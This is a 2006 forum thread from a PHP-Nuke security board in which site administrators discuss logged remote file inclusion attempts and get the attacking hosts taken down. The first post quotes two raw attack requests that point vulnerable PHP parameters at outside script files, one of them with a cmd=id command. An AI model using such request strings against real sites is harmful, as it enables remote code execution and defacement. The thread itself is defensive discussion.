Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Tue Feb 07, 2006 11:31 am Reply with quote

I´m not using AllMyGuests anymore, but I noticed since I installed the 404 error page with mailfunction a lot of mails like this with IP´s from Brasil and some other countries too:
Quote:

------------------
201.58.68.105 /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.portodemoz.pa.gov.br/su.txt?bug0?

User Agent =
------------------

201.9.158.203 tried to load //include/write.php?dir=http://www.webzenxd.kit.net/tool25.txt?&cmd=id

User Agent =


Does this means someone is running that "D" tool or is this more automatically ? Of course I can ban Brasil completly but it isn´t the solution. How to stop this ?
 
View user's profile Send private message
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Tue Feb 07, 2006 2:21 pm Reply with quote

indeed my dear susann....im sure your glad now having my 404 huh... Smile
yes they are looking for ways to hack the place..
i maild the brazilian owners of ...www.webzenxd.kit...etc.... 2 days ago..and as you visit it you see they finaly took the site offline..... Razz
so it is usefull to mail providers and pulling websites down,even in brasil..
 
View user's profile Send private message
Susann
PostPosted: Tue Feb 07, 2006 3:43 pm Reply with quote

Thanks Hitwalker, Smile

Yes, the 404 pages are helpful because you are good informed in time.I get my logfiles allways one day later.

Because of the cmd and AllMyGuests I googeled and what me shocked is that this d tool can be found on several sites.
 
hitwalker
PostPosted: Tue Feb 07, 2006 3:50 pm Reply with quote

yes i know....a lot were usualy hosted by yahoo (geocities) ,but they respond faster lately....
yesterday i got a big thank you from an american who had a hacked area on his site he didnt know of..
they uploaded the same stuff that was on the brasil website.
he was gratefull for the warning.....
point is,i didnt had to do that.
if people would do it more often then there would be less addresses to abuse.
 
Susann
PostPosted: Tue Feb 07, 2006 4:36 pm Reply with quote

Quote:
if people would do it more often then there would be less addresses to abuse.

Exact that´s the problem.The most people are to lazy or they hesitate to do it because they really don´t know what´s going on.
 
hitwalker
PostPosted: Tue Feb 07, 2006 4:54 pm Reply with quote

I had another one susann,this one was hosted at 100free.
I wrote them ...
(names etc ...are taken out)
Contact Name: hitwalker

Support Issue: please remove the following account.

They just replied with:

This site has been removed from our hosting services for violations of our
TOS (Terms of Service). Additionally, all sites associated with the email
address used to sign up for hosting have been removed. Thank you for
bringing this to our attention.

Nice huh..... killing me
 
Susann
PostPosted: Tue Feb 07, 2006 8:22 pm Reply with quote

Nice. It's as simple as that Smile
 
Susann
PostPosted: Fri Feb 10, 2006 9:37 pm Reply with quote

Quote:
m sure your glad now having my 404 huh
Well, it´s a never ending story with the signin.php. There must be any reason why I received at the moment a lot of this kind of mails.
 
hitwalker
PostPosted: Fri Feb 10, 2006 10:28 pm Reply with quote

yeah i get them to....but its getting less now..also getting some profile.php....lol
but as you saw by now susann how busy they are....
but i believe most of them are automatic scripts that pull website url like ours from scripts....then the let a script run with different proxies.
ive seen that a lot by now,same url over and over like 4 or 5 times within 1 minutes with 3 or 4 different ip's.
 
Susann
PostPosted: Sat Feb 11, 2006 5:45 am Reply with quote

Well, I visit some hackers site after the first email and I thought first this could be the reason. But I found about the "D" tool 2 interesting articles one is from isc.sans.org "We have received additional reports of attempted site defacement leveraging the same tool suite referenced above but targeting PHP-Nuke sites specifically."
 
hitwalker
PostPosted: Sat Feb 11, 2006 6:27 am Reply with quote

well thats all they do...
most people dont even know whats going on on their server..
and we have both ways covered now as i like to believe...
or we get a wanna be hacker attack and sentinel kills him on site or they call for a page i dont have and i get the 404 and i kill them personaly Twisted Evil
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©